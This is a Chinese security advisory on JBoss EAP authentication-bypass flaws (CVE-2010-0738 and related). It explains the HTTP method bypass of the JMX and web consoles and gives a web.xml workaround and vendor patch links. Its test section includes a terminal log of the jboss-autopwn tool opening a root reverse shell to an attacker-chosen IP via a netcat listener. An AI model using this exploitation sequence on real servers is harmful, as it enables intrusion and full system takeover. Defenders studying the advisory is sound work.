安全研究
安全漏洞
JBoss企业应用平台多个非授权访问漏洞
发布日期:2010-04-26
更新日期:2010-04-28
受影响系统:
RedHat JBoss EAP 4.3不受影响系统:
RedHat JBoss EAP 4.2
RedHat JBoss EAP 4.3.0.CP08描述:
RedHat JBoss EAP 4.2.0.CP09
BUGTRAQ ID: 39710
CVE ID: CVE-2010-0738,CVE-2010-1428,CVE-2010-1429
JBoss企业应用平台(EAP)是J2EE应用的中间件平台。
JBoss企业应用平台中存在多个非授权访问漏洞,远程用户可以绕过认证执行非授权操作或读取敏感信息。
1) JMX控制台配置仅对使用GET和POST HTTP命令的请求指定了认证要求,远程攻击者可以创建没有指定GET或POST的HTTP请求,导致无需认证便被默认的GET处理器执行。
2) 默认阻断了对JBoss应用服务器Web控制台(/web-console)的非认证访问,但这种阻断并不彻底,仅阻断了GET和POST HTTP命令。远程攻击者可以利用这个漏洞访问敏感信息。
3) RHSA-2008:0828更新修复了未经认证用户可访问状态servlet的漏洞(CVE-2008-3273);但RHSA-2009:0349中的bug修复重新引入了这个漏洞。远程攻击者可以利用这个漏洞获得有关所部署的web上下文的详细信息。
<*来源:Giorgio Fedon
Stefano Di Paola (stefano@dipaola.wisec.it)
链接:http://secunia.com/advisories/39563/
http://blog.mindedsecurity.com/2010/04/good-bye-critical-jboss-0day.html
https://www.redhat.com/support/errata/RHSA-2010-0379.html
https://www.redhat.com/support/errata/RHSA-2010-0377.html
https://www.redhat.com/support/errata/RHSA-2010-0376.html
https://www.redhat.com/support/errata/RHSA-2010-0378.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Got this working with JBoss-autopwn :-D
Screenshot below..
[root@foo jboss-autopwn]# ./jboss-autopwn 192.168.1.3 8080
[x] Checking if authentication is enabled..
[!] Authentication enabled!
[x] Proceeding to use CVE-2010-0738 JBoss /jmx-console authentication bypass
[!] Is this a *nix based or Windows based JBoss instance? nix
[!] Which IP should I send the reverse shell to? 192.168.1.2
[!] Which port should I send the reverse shell to? 6669
[x] *nix based selected...
Connection from 192.168.1.3 port 6669 [tcp/*] accepted
[!] you should now have a shell on 192.168.1.2:6669
[root@foo jboss-autopwn]# fg 1
nc -lv 6669
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
uname -a
Linux nitrogen 2.6.29.6-213.fc11.x86_64 #1 SMP Tue Jul 7 21:02:57 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
^C
[root@foo jboss-autopwn]#
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 修改访问配置,阻止其他的HTTP访问方式。
修改 web.xml 文件,默认位于 server/default/deploy/jmx-console.war/WEB-INF/ 目录下:
------------------------------- 8< -------------------------------
<!-- A security constraint that restricts access to the HTML JMX console
to users with the role JBossAdmin. Edit the roles to what you want and
uncomment the WEB-INF/jboss-web.xml/security-domain element to enable
secured access to the HTML JMX console.
<security-constraint>
<web-resource-collection>
<web-resource-name>HtmlAdaptor</web-resource-name>
<description>An example security config that only allows users with the
role JBossAdmin to access the HTML JMX console web application
</description>
<url-pattern>/*</url-pattern>
<http-method>GET</http-method>
<http-method>POST</http-method>
<http-method>HEAD</http-method> <------- 增加此行
</web-resource-collection>
<auth-constraint>
<role-name>JBossAdmin</role-name>
</auth-constraint>
</security-constraint>
-->
------------------------------- 8< -------------------------------
厂商补丁:
RedHat
------
RedHat已经为此发布了一个安全公告(RHSA-2010:0376-01)以及相应补丁:
RHSA-2010:0376-01:Critical: JBoss Enterprise Application Platform 4.2.0.CP09 update
链接:https://www.redhat.com/support/errata/RHSA-2010-0376.html
浏览次数:4803
严重程度:0(网友投票)
绿盟科技给您安全的保障